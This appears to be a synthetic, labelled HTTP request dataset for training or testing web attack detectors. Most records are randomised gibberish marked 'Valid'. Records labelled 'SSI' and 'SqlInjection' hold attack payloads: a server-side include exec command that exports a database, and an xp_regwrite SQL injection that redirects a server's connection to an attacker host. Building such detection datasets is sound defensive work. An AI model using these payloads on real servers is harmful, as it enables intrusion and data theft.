Content-Location: http://www.llteNRot.fr/clib.cfm
Content-MD5: ZTR4TmVpb29uNmFvaGFodA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Sep 04 09:30:38 UTC
Last-Modified: Thu, 26 Aug 04 11:29:27 CET
Host: 212.224.249.21:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, us-ascii;q=0.8, ks_c_5601-1987;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 126.24.26.169
Cookie: SjaUeez3Msdba=oCoz1Um70lJK;itoese4ida=nr/ri;c2CdSe7cb=Rftp4
Cookie2: $Version="0"
Date: Sun, 05 Feb 06 18:53:24 CET
ETag: "sRRxnJ6Z_qxKvecEKi.-"
Expect: 100-continue
From: ocSTi@saeeTeucT.ch
If-Modified-Since: Fri, 04 Jun 04 02:13:27 UTC
If-Unmodified-Since: Tue, 01 Jul 08 20:32:08 GMT
If-Match: *
If-None-Match: "WCVLaKI3oHCXNO.Qm"
If-Range: "FnhDSXnfh-YON3PZNWQ"
Max-Forwards: 352
MIME-Version: 5.5
Pragma: yn=6lOct0ao
Proxy-Authorization: dotzna obUns=tvetsd
Authorization: Basic MmhuaGQ6bHNucg==
Range: 157212-,-82365,95975-54243
Referer: /yro8sa/bnhMtwo.mdb
TE: chunked,trailers
Trailer: Authorization
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 9.1; hr-eg; rv:1.4.2) Gecko/33377605
UA-CPU: StrongARM
UA-Disp: 020,4035,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 520x205
Via: rioil/9.1 www.hc3pwea.js
Transfer-Encoding: deflate
Upgrade: detns/4.1, EOl/7.8, 4eoS/2.5, trr/3.6, vyat/5.5
Warning: 146 www.heyaohc7.png "iqTeaiaieCen" "Thu, 28 May 09 11:14:53 UTC"
X-Forwarded-For: 109.249.70.237
X-Serial-Number: 695598853636
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mPcCS=hlfapt&mezsEneeqpt=Tasa &0oipslh=gh&ise=e5REsaccepttewi&fuOrdarWl=hpess4ilogawlibydn&t0mmohiShili3=nhzS3A9

End - Id: 33740
Start - Id: 8857
class: Valid
GET /lautoexecCvT_3nboot.ini_N/o3yd/nEkmXmGn5sDhj/xLyKyWB@DgDwYb6n/hW3/OsWitni/mvsosoly/axWDeKz.gif?naW4=124601&dieasottee=nis%3Bnv&STshutdownZTiframe=94375&vbscript5aRU=7&chaniah=78729333 HTTP/1.0
Host: 155.189.27.147
Connection: close
Accept: audio/basic, text/*, video/quicktime;q=0.8
Accept-Charset: koi8, x-mac-greek, utf-7, ks_c_5601-1987, windows-1252;q=0.1
Accept-Encoding: 
Accept-Language: rhuier-nf9t9oHa;q=0.4, T37psa-h;q=0.2, thtea-e4l;q=0.2
Cache-Control: no-cache
Client-ip: 73.159.234.63
Cookie: 9iisodosl9i=0Ts;mTnatya8i=8562;nhoat=6377159;iutyaeernwE6eau=5352012
Cookie2: $Version="67"
Date: Tue, 07 Oct 08 03:46:36 CET
ETag: W/"pXSCo35tRrXsat."
Expect: 100-continue
From: nnsIg@cmoeufg.uk
If-Modified-Since: Sat, 10 Nov 07 14:29:37 CET
If-Unmodified-Since: Fri, 21 Dec 07 10:36:56 CET
If-Match: *
If-None-Match: *
If-Range: "yrh.4q0812bsXRB"
Max-Forwards: 284
MIME-Version: 1.5
Pragma: af='wt'
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: Digest realm
Range: 7-
Referer: http://www.evlctv.be/trmmx/wvyn/osUGac.msf
TE: deflate;q=0.8
Trailer: Max-Forwards
User-Agent: eann (zMINg@8on; 6iExFIhV5E; vaSQ1TcgmM)
UA-CPU: Sparc
UA-Disp: 909,1237,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 345x783
Via: FTP/5.9 22.185.17.144, HTTP/3.8 34.96.149.14
Transfer-Encoding: identity
Upgrade: it9o/7.8, e4esfs/7.3, Csos/8.4
Warning: 091 www.bqal5R.jpg "tAj9t" 
X-Forwarded-For: 160.159.126.87
X-Serial-Number: 56388963279118
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8857
Start - Id: 29138
class: Valid
GET /etgse7m/drsc/wot1sB/YI0TR5ychild0Gandpv/eQfA50ktEmlbkD/H31logA-qJnIP/atTtdtWacNEr3wcweug/to/tnomtrerd/hQesAvI.htm? HTTP/1.1
Host: 69.148.170.152
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2, x-mac-chinesetrad, euc-tw, ks_c_5601-1987
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.7
Cache-Control: max-age=1
Client-ip: 101.253.47.207
Cookie: 3tO5s=tPcGaFv4scL
Cookie2: $Version="429"
Date: Sun, 26 Sep 04 19:16:09 UTC
ETag: "2fcfWijE.03EDxaTmu"
Expect: 100-continue
From: 9tlsAera@gi2n.org
If-Modified-Since: Sat, 02 May 09 21:50:53 CET
If-Unmodified-Since: Fri, 29 Dec 06 19:24:51 UTC
If-Match: *
If-None-Match: *
If-Range: "jC2HAdGS5UC7gulXF"
Max-Forwards: 522
MIME-Version: 6.1
Pragma: 5s=ttjf
Proxy-Authorization: r6cRja o1ns=aoel
Authorization: aeucof rrpoheeq=npBlr
Range: -6
Referer: http://www.Isek.ch/uls0yth/Ieent.cgi
TE: trailers
Trailer: User-Agent
User-Agent: u-aZIwPN http://www.fitis.it
UA-CPU: MIPS
UA-Disp: 112,924,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 466x304
Via: 5.4 www.rwioi.jpeg, FTP/5.4 www.ak3QR.css, HTTP/3.8 223.115.50.71
Transfer-Encoding: eOa3r; tnd2lgoa=nycidv
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 15.219.134.176
X-Serial-Number: 1881707
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29138
Start - Id: 29137
class: Valid
GET /zEXl_06YuTq1HgNVr00i/2pm6/esifahhtmj73m7he/ltqtetpLkybh/oitrs9a0tEcidsant/t@jPmKEo/eDfiRBi9BPGKxIeY4p/s5u46bl/ahunrEass1ECm/izi2iiSMdeahq2f.php?oNannse=htrdshsqos1&rtrl0tr9Btmt=ci&lNdsfo=qds8&ahkasaaanqeas=3&1or=fi&hAtn0rsd4bws=aDKrHndxxv5C&cohtwd0eta=9s6sollEaQ0 HTTP/1.0
Host: www.AtEiG1.de
Connection: close
Accept: image/*, application/rtf;q=0.4
Accept-Charset: iso-8859-2, x-mac-chinesetrad, euc-tw, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=1
Client-ip: 101.253.47.207
Cookie: 3tO5s=tPcGaFv4scL
Cookie2: $Version="429"
Date: Sun, 26 Sep 04 19:16:09 UTC
ETag: "2fcfWijE.03EDxaTmu"
Expect: 100-continue
From: 9tlsAera@gi2n.org
If-Modified-Since: Sat, 02 May 09 21:50:53 CET
If-Unmodified-Since: Fri, 29 Dec 06 19:24:51 UTC
If-Match: *
If-None-Match: *
If-Range: "jC2HAdGS5UC7gulXF"
Max-Forwards: 522
MIME-Version: 6.1
Pragma: 5s=ttjf
Proxy-Authorization: r6cRja o1ns=aoel
Authorization: aeucof rrpoheeq=npBlr
Range: -6
Referer: /htme/lNScNebw/dxtftl.exe
TE: trailers
Trailer: User-Agent
User-Agent: 20era5smsrn
UA-CPU: MIPS
UA-Disp: 112,924,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 466x304
Via: HTTP/2.8 167.173.188.174
Transfer-Encoding: compress
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 15.219.134.176
X-Serial-Number: 1881707
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29137
Start - Id: 7073
class: Valid
POST /utmAta/7hriiuhSZmnryii4e/awzenloasei4nCul/@KmV0qiframezh0sdu/nJuJ4/Ei7thvt/ufraOtS4ieerel/ud/seXmUsTlF_W0m/positionCq9DJupdate1passwd6jsystem/lseonk.asp? HTTP/1.1
Content-Length: 48
Content-Language: ohaentte
Content-Encoding: compress
Content-Location: http://sbhsamo.com/cied3Cpr/mclfe/irsa.png
Content-MD5: dG5tdHR0amdVZWVzZ21ydA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Dec 09 20:24:25 CET
Last-Modified: Sun, 28 Sep 08 22:35:50 UTC
Host: www.fIoo.gov
Connection: oiatiti
Accept: */*;q=0.0
Accept-Charset: x-mac-ce;q=0.1
Accept-Encoding: deflate;q=0.7, identity, identity;q=0.8, deflate;q=0.0, identity;q=0.0
Accept-Language: baecte-eei3tr, tned-yxgrmh;q=0.6
Cache-Control: sljdRs=oel
Client-ip: 133.103.82.179
Cookie: ath=e;rEvu6nhot4Ff0oi=lo0reieau;kBC@mQr5SJDlink=qD6YNa3btH;tpFaonhsegMyy=tuthItn5erinwdu;ylibGBQhuDR=7
Cookie2: $Version="672"
Date: Sun, 03 Sep 06 18:02:32 UTC
ETag: W/"ZK7Y4he@iaf_mrz9c"
Expect: PaHiyuo
From: dsgletSd@lzsej.ch
If-Modified-Since: Thu, 17 Sep 09 20:17:42 UTC
If-Unmodified-Since: Wed, 02 Feb 05 07:32:52 CET
If-Match: "irwUU@TBN@oaS6Bm2"
If-None-Match: *
If-Range: "p_oLq2x-OcXzu2kXsK"
Max-Forwards: 83
MIME-Version: 2.7
Pragma: ehrL='snr'
Proxy-Authorization: NTLM WmExdG5ldGF0ZG50c2lsOWF5Y2lpc2VyYndmZXRoNDFvYg==
Authorization: Digest username="eudhd"
Range: 69519-,580-44
Referer: /eerm/oIeeqlw/zreeen/eHo8.php3
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/8.8 (X11; U; Unix 7.8; ra-ts; rv:6.2.6) Gecko/08646026
UA-CPU: x86
UA-Disp: 4109,8794,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6819x838
Via: 4.7 225.142.99.72:903, 7.0 69.137.45.207
Transfer-Encoding: pRBw8s
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 300 www.4aei.js "Ajhoehebly" "Tue, 03 Nov 09 18:37:06 CET"
X-Forwarded-For: 6.110.131.156
X-Serial-Number: 317162195276859
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

odiF=r&tahhsx5ea=bydt (sorc\vbscriptchpse)

End - Id: 7073
Start - Id: 1998
class: Valid
GET /hTy/hh7e9it8h9nea/4outtrrsnt/eAAIm3diy/9GVEU/eFxUTQTL1J/nJ3YcjcLZbTrNB-f/dW34N/eaet/zrtmeeebdttoc/BN/2r36WcBUdy.html?Ru8eeWehaz=180876&Xttvrk0=likesf HTTP/1.0
Host: www.iush0hf.de
Connection: asRx
Accept: audio/*, application/*;q=0.5, application/*
Accept-Charset: x-mac-korean
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 251.15.14.72
Cookie: bls-L=hdro;7fX17Zzf=esgYh9;ncptseteUgum=h2h;0TFunionfDncjkL=nssff4nnyxstyle;yNEnc=ar1on;eeiotmhaEtln=-ogservicesewi l nary
Cookie2: $Version="3"
Date: Thu, 04 Oct 07 20:01:14 CET
ETag: W/"w2u94EbQOo5wOm0e"
Expect: min0ola=ertGe
From: tlvajp@oiboillauo.de
If-Modified-Since: Wed, 30 Dec 09 23:13:32 CET
If-Unmodified-Since: Tue, 22 Sep 09 17:44:21 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Jul 04 17:13:54 CET
Max-Forwards: 8950
MIME-Version: 7.0
Pragma: 0qtirap='aa'
Proxy-Authorization: Digest response="E5aFdFbEaCD6EF1Ba75E4CAB8aA5F4eE"
Authorization: Basic dGQzY2VvOm5ub2xv
Range: 9726-,-403498,8792-
Referer: /eo78el/etlrbea/w2ni0tih/lwicm.mspx
TE: trailers,gzip
Trailer: Expect
User-Agent: emp-UlF http://www.8je78.gov
UA-CPU: MIPS
UA-Disp: 5129,6449,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 396x457
Via: 3.7 www.sicjee.shtml
Transfer-Encoding: compress
Upgrade: icjnho/3.6, diut9V/0.7, atedi/1.4
Warning: 966 www.JL9teh.jpeg "ynaqaf4" 
X-Forwarded-For: 241.61.46.107
X-Serial-Number: 1442191022000
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1998
Start - Id: 30198
class: Valid
GET /sNle9UTPc@J9-2J@/aZTya3..4kPKTR6/4am/lo1dDilF/Ip0uoeqo9lCgesee/9vanobdbbtey8wila/Esattysdxtat2iilw/r2EWgb6g8pOf/a7Wg9A.sh?RyMstdin_=a6bx&baaDn=37148&edtmttauThetks=rtseosam&iK5vM=+8Cwherescriptd3oKywea&iMin04eya=4954&tkYy=qxzQ&8trocain=h1tn HTTP/1.1
Host: 247.126.75.101:80
Connection: denp
Accept: text/*;q=0.8, audio/*;q=0.7, audio/basic;q=0.7
Accept-Charset: iso-8859-8-i;q=0.3
Accept-Encoding: compress
Accept-Language: aeoHwdt-aiponh;q=0.5, 9o-Zmder2n;q=0.6
Cache-Control: no-store
Client-ip: 52.71.28.255
Cookie: AjL_=;esdiv;8eSknegameq=0
Cookie2: $Version="8"
Date: Sat, 30 Oct 04 17:53:42 CET
ETag: W/"cxq2qJsQECsfzqrbt0"
Expect: gCiaud=uaseai;Iittoha
From: wieAim@aawfi.fr
If-Modified-Since: Fri, 20 Nov 09 10:57:43 CET
If-Unmodified-Since: Sat, 12 May 07 19:41:08 GMT
If-Match: "zD-Lcn0gcl2JEA."
If-None-Match: "JqIA13RmFLVCRFV57Ep"
If-Range: Fri, 19 Mar 04 20:38:18 CET
Max-Forwards: 78
MIME-Version: 4.6
Pragma: adp='temm'
Proxy-Authorization: Digest realm
Authorization: Digest nc=38EDB5CF
Range: 8-
Referer: http://www.kltvlaSg.biz/owlsatss.tiff
TE: trailers
Trailer: Authorization
User-Agent: t9GlB3 http://www.sydtiemk.be
UA-CPU: x86
UA-Disp: 058,5611,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8300x7095
Via: HTTP/1.7 www.a56w.png:190, 2.3 www.5suab1.jpeg
Transfer-Encoding: identity
Upgrade: b3o/9.5, GAht/3.4, srandh/5.5, alyedi/9.3, Cwlt/7.4
Warning: 602 32.88.153.167:23729 "hrge" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 19194011026
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30198
Start - Id: 6139
class: Valid
PUT /hewTls2bsE/eGHSNVyhWt/5ytiemlervrn/mX/jdo.jpg? HTTP/1.1
Content-Length: 64
Content-Language: ra6A,5nnt,afilsst
Content-Encoding: deflate
Content-Location: /fn8nwro/clsm/Sylh/sndauo/d0hhrx.rar
Content-MD5: ZW5kZXJldHd0ZWVBYW5oOA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 31 Jul 09 19:01:44 CET
Last-Modified: Wed, 24 Oct 07 03:36:13 GMT
Host: 97.168.136.149
Connection: ipor
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: 3brfh6-tbejau;q=0.2, oieec-H;q=0.5, rEln-tsiMdi, fe-Nejag;q=0.0
Cache-Control: max-age=24534
Client-ip: 124.193.73.246
Cookie: DsSye0lr=sod4okttf;Ychttpyo1l=OrdND dim5iae]nwpsht
Cookie2: $Version="52"
Date: Thu, 20 Dec 07 09:58:29 CET
ETag: "-1JU0w8x7nVeD3F"
Expect: meaF=Ewr0e;un9o=eexf1
From: arnac8@nERnnE.be
If-Modified-Since: Fri, 11 Jul 08 24:53:22 CET
If-Unmodified-Since: Thu, 27 Nov 08 21:31:48 GMT
If-Match: "T8f.ngLVsvzYE8u"
If-None-Match: "97XR1@Ts0f@forE"
If-Range: Wed, 13 May 09 15:29:33 CET
Max-Forwards: 471
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=cedo
Authorization: NTLM bmVjZWZsb290bGFpaGN2OWt1ZXJ1cG5kVHRyYWJmYXM5c3V1dG55aA==
Range: 611533-,1458-075
Referer: http://fDbnossr.biz/iokaD/e0i1/sesen/trtbc.txt
TE: trailers,deflate,chunked;q=0.3
Trailer: Via
User-Agent: Mozilla/7.1 (compatible; eoneig; Solaris; ohn8dd)
UA-CPU: PowerPC
UA-Disp: 8680,157,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 853x3655
Via: ssrBki/8.3 www.ehwotOrf.css:0, n7u/4.8 75.173.204.193, FTP/9.9 www.Eleoifut.css:7
Transfer-Encoding: deflate
Upgrade: pnds/8.6
Warning: 194 www.xmkm27h.jpg "hyeTpth" 
X-Forwarded-For: 102.22.144.240
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

WtshutdownyEconnectTDfromprocessing-instructionSo=4098&hyTe=lfu1

End - Id: 6139
Start - Id: 40247
class: SSI
PUT /sylCst/phpT8%uV.1c5home1Yexp_T/R@WVL/6-UfFP5ebdk-9lR/kADWs/vsdHcao2rvOeernroNr.jpg? HTTP/1.0
Content-Length: 368
Content-Language: jywiEeno,aamuoh,ns
Content-Encoding: gzip
Content-Location: http://omy8etp.gov/1lfn/sasa/MthOhra/9mhyk/srl0smf6.txt
Content-MD5: bjhwNDJzdjFBZTlzYWhpdA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 28 Jul 05 23:02:28 UTC
Host: www.6htmauiydI.uk:0
Connection: keep-alive
Accept: video/*;q=0.0
Accept-Charset: iso-8859-8;q=0.1
Accept-Encoding: *
Accept-Language: thOsb5-sj, 6aoo3t-ls4, l-e
Cache-Control: max-stale
Date: Tue, 27 Mar 07 19:08:45 UTC
Expect: 100-continue
From: YHtcdN@wRae.uk
If-Modified-Since: Tue, 29 Nov 05 13:06:39 UTC
If-Unmodified-Since: Sat, 18 Mar 06 06:58:49 UTC
If-Match: *
If-Range: "0-AFNjgcTtS6G5KV."
Max-Forwards: 655
Pragma: no-cache
Referer: http://www.Nds8tFi.st/cshaoel/tyrn/6194Er/aua2dl.js
TE: trailers,trailers,trailers
User-Agent: Mozilla/9.0 (X11; U; SunOS sun4u 3.7; hc-4n; rv:9.8.7) Gecko/57659947
Via: 9.7 179.110.11.115

swlHdaErd=<!--    #exec   cmd="c:\progra~1\rEogs\sroea1daOm\hsspitt.exe     d:\0biou\www.inndleti.org\da6e\database.mdb /x  exporttofoxpro"-->&Ex1yr=i9&DRcso5oogesediu=fwscdookacIgctYie&8DsXxZiGP=xeeti&oqelcb3LoeRs7=19779521&ZWDkFo7AkZ=2396659611&w-2PJZVt=0372&bhda=HhbbSa&lck=u0&6rie=moweTsictin&nnv4hcmdpo8=stdinietioriskxp_xEav

End - Id: 40247
Start - Id: 29376
class: Valid
GET /xterm6ijClOpasswdS.jpg?6aihdnnsbhtaTe=175&gtqi=+p%3A0hsilHtz+7D&tfaclistcvkoh=inwzelu HTTP/1.1
Host: 152.230.109.218:89
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.5, iso-8859-2, windows-1258
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: min-fresh=1505
Client-ip: 167.36.208.51
Cookie: IWbFnullXSselectJjm=9
Cookie2: $Version="515"
Date: Fri, 18 Dec 09 16:31:40 CET
ETag: W/"fA3ZKS2Ci0QFLw9dz13"
Expect: 100-continue
From: ettae@erec.de
If-Modified-Since: Tue, 23 May 06 21:10:27 CET
If-Unmodified-Since: Tue, 07 Aug 07 17:42:50 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Aug 05 03:31:54 CET
Max-Forwards: 0889
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: aaits m7dhf=46hal26a
Authorization: Digest response="FEAD2bdFAb7cEDA9F94bE0Bf56d4DB6a"
Range: 60-931,-49,8-736
Referer: /faoet/irto/hgDm2/5eihAL.png
TE: trailers,chunked,deflate
Trailer: Accept-Charset
User-Agent: netEugr
UA-CPU: StrongARM
UA-Disp: 468,4853,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 183x157
Via: HTTP/1.0 0.24.75.12, 6.0 65.110.151.57
Transfer-Encoding: gzip
Upgrade: iaepj/3.1
Warning: 447 169.93.32.223 "aIpcxkf8sawnqanmjire" "Tue, 19 Aug 08 09:49:59 UTC"
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 50755741783
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29376
Start - Id: 41107
class: SqlInjection
GET /Oarsere4ssY/RtttHhi/heeqcvruxyR/scriptWP/iLZHrupqTJdz0AxvY/wraietstttfnqn/adminnscriptS83d5allG/dietra1axmlhTn/uiairIL/7VFJjKY/f@Ofg9F/wXK4g.shtml?0syotaWn=exec+++++xp_regwrite+%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27oeeaenHoI%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27 HTTP/1.0
Host: 78.174.69.23:4
Connection: etSm07
Accept: image/png, audio/basic;q=0.9
Accept-Charset: windows-1255
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 212.123.245.198
Cookie: nsUatrbIeeeh3ah=|wtx;asuumccOrrRutls=a3sAbne;psa=DasietDOsafnit1u;roethSA0w=p5rGjwjcqizQ
Cookie2: $Version="183"
Date: Wed, 31 Oct 07 02:32:51 UTC
ETag: "08c.BwX7mSH8DfY"
Expect: iCconail
From: ctnineei@15crtioebx.de
If-Modified-Since: Fri, 05 Nov 04 20:47:13 CET
If-Unmodified-Since: Sat, 23 Feb 08 20:37:52 UTC
If-Match: *
If-None-Match: "aKihmhKJiNeeRiCI"
If-Range: Mon, 25 May 09 24:43:34 GMT
Max-Forwards: 7609
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: 4a1uo 4pt9hp=4broyo
Range: -397
Referer: /8ica/oeuhrP.mp3
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 5.1; op-rg; rv:1.7.7) Gecko/74778560
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: 3.9 169.175.213.156, ec8/8.9 73.188.77.106, tee/9.9 www.2akemqIu.png
Transfer-Encoding: matoan; jymwutb=eigrn
Upgrade: s3t/0.2, css/4.1
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 50.70.237.114
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41107
Start - Id: 34934
class: Valid
PUT /eA3oj@9m/amte9de8ob/sn7doOdGEHusoTs1mE/s7lvsoicfepagzwteTj/uf@Zo-/j9w-/b0i/rRGtjointeettnp/eikLJlyjiCB1XzY.exe? HTTP/1.1
Content-Length: 149
Content-Language: oidn
Content-Encoding: compress
Content-Location: http://www.ei9eeha.cz/rgcpeau/rrezonR0/msIleOt/uinno.pl
Content-MD5: ZGV0U2FjRW9lSXRlb2FsOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Jun 05 18:59:36 GMT
Last-Modified: Mon, 17 Aug 09 18:50:05 UTC
Host: www.ieede6eO6n.biz
Connection: close
Accept: video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 253.250.214.170
Cookie: mnbauoo0ht7=sky;3o.WSc.W0between6= iir;mMnrc5pntr=010;fetbaoelrOOnaea=-@eeobtobject voptelnetaa;go=800;hEsycaqhpor=i(i0
Cookie2: $Version="916"
Date: Sun, 11 Dec 05 09:17:51 GMT
ETag: "Hqp6pur1VB41y-Y"
Expect: ncCs9wt=rTxL;cide=txRe3
From: sdqf@ierMt4h.ch
If-Modified-Since: Tue, 06 Jul 04 02:49:59 UTC
If-Unmodified-Since: Wed, 18 Jun 08 23:48:17 UTC
If-Match: *
If-None-Match: "KVmKFbFfNO2SfFPg"
If-Range: Sat, 22 Aug 09 04:35:29 UTC
Max-Forwards: 530
MIME-Version: 9.6
Pragma: hezg=NHwt
Proxy-Authorization: Digest qop=auth
Authorization: NTLM b3J0QnJ0TzJjYWNwdG1vaG5yZW1hcnVOYW5hZWxvNmRXc2dINQ==
Range: 26302-,-510,4934-
Referer: http://www.5ubhwso.cz/tteaoH2.msf
TE: deflate
Trailer: If-None-Match
User-Agent: thsnhqgloha
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2377x8201
Via: tEenc/3.3 www.A9Or5re.html
Transfer-Encoding: deflate
Upgrade: yeadoo/9.1, ynen/6.6, egnCa/7.9, uis/6.9
Warning: 359 www.njae1.jpeg "gttepstwaI" "Wed, 09 Dec 09 02:56:18 UTC"
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 61683738419
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bnt1rexehk=acYN_xsn&KfFKQbHb=491139&uaeieoejjrl=9639164&okbtcnae2T=Nsn&n9hX4nhetOhro=ei9a&co2hhseue=pswnq@adminlhreeis-&ReoezRlbT=h5erhtNnekflrauos

End - Id: 34934
Start - Id: 27734
class: Valid
GET /lg9i/childlO3e7wPUconnect2EQ/ayg-/nwdns/edaeae7he/r9vSEzMm/cveotiasd/hfpgen/jT@lxNo0-bLx_nAWM.htm?ty=necin5&rStssi=oly9ieedsrh&uytej=eeos&sowroiecuIbteeh=6grivn&qtf=tdEj9pqyL5g&PKNSiVV6insertwvbscriptS=raUhh&3elyo=694412&qr=01730&ajaedv=9uiB&aujn1lt6of=24766&4rhld=194&sg=mWfwm3RaWNw&eseqaa7dds=d4tc&R6eh=hEnSm1enalfonb6lje HTTP/1.1
Host: 206.111.181.138
Connection: eoptMynf
Accept: text/*, audio/*;q=0.6, audio/basic;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: w-f0;q=0.0
Cache-Control: min-fresh=675
Client-ip: 93.88.109.169
Cookie: dsbtrfKg5t7dP=zfZNMXNcaF;tet4otccteoe8ca=roeeod;sO40MN=qs/eom5h3;Ckwp-O=SO0ar
Cookie2: $Version="949"
Date: Tue, 08 Nov 05 07:19:06 CET
ETag: "v0pLV3uZiu.O-qE2qN.1"
Expect: 100-continue
From: dfieu@iuThbo4r.uk
If-Modified-Since: Thu, 22 Dec 05 01:13:47 UTC
If-Unmodified-Since: Wed, 13 Jun 07 21:54:08 GMT
If-Match: "jcLzerIf-ZgsWSf44@"
If-None-Match: *
If-Range: Sat, 28 Jun 08 15:20:15 GMT
Max-Forwards: 1696
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic dFJEdGk6NVluZQ==
Authorization: Basic cHZzc1B3Oml5SHN0
Range: 6-4,53-
Referer: http://Be8d4i.cz/tatpo/wqeo/etnT.pdf
TE: trailers,chunked,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.4 (compatible; MSIE 2.8; Linux i586; dEyect; ukluc6itrr; vsaotdis)
UA-CPU: 68000
UA-Disp: 909,493,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 483x5740
Via: FTP/4.7 www.unrisbyt.jpeg
Transfer-Encoding: deflate
Upgrade: ugn/2.8
Warning: 358 www.hu7esut.jpeg "amcct9eduta2rliG" 
X-Forwarded-For: 120.223.12.165
X-Serial-Number: 3296146
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27734
Start - Id: 23240
class: Valid
GET /rasmkomEaci2s5/InqsiiDdhgtnd/ati.jpeg?5s0r7qWdy_v=rEf&neRtoTiOr4=osnh5+n%3DreAmaT%3Feo&acceptrryBJ6dBH0P=dj7mbIv&sheMerw=880733051&szoms=a7CiARen&onyiuuewpl=os1eoptbi&0kgeogozvwntAaM=nr+h&bivte5tg6oi8=shisi1jeY0ge&g0isrhaah=t&bLrGbVbphpdoI=f0lirlon9&tel=n%40bfx7ZnP-n&ta4y=aXq&sone=Hwhrmwipae HTTP/1.1
Host: 91.181.232.59
Connection: jte7bsu
Accept: text/*;q=0.7, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=98587
Client-ip: 138.156.42.202
Cookie: srool5Dt1iot=desimgh;4ndehg6rejethe=ltenc:=dvhttfePar;uNtsksc9nci=acceptyks
Cookie2: $Version="5"
Date: Mon, 02 Nov 09 09:22:39 CET
ETag: "Y1KV1ibzvGiIj2AYz.A"
Expect: aaaige=TmCl9
From: sebe@tnldorehze.de
If-Modified-Since: Sat, 06 Dec 08 20:20:28 CET
If-Unmodified-Since: Sat, 03 Jun 06 09:38:06 UTC
If-Match: *
If-None-Match: "uu4B3WM0UX3ehb9EW"
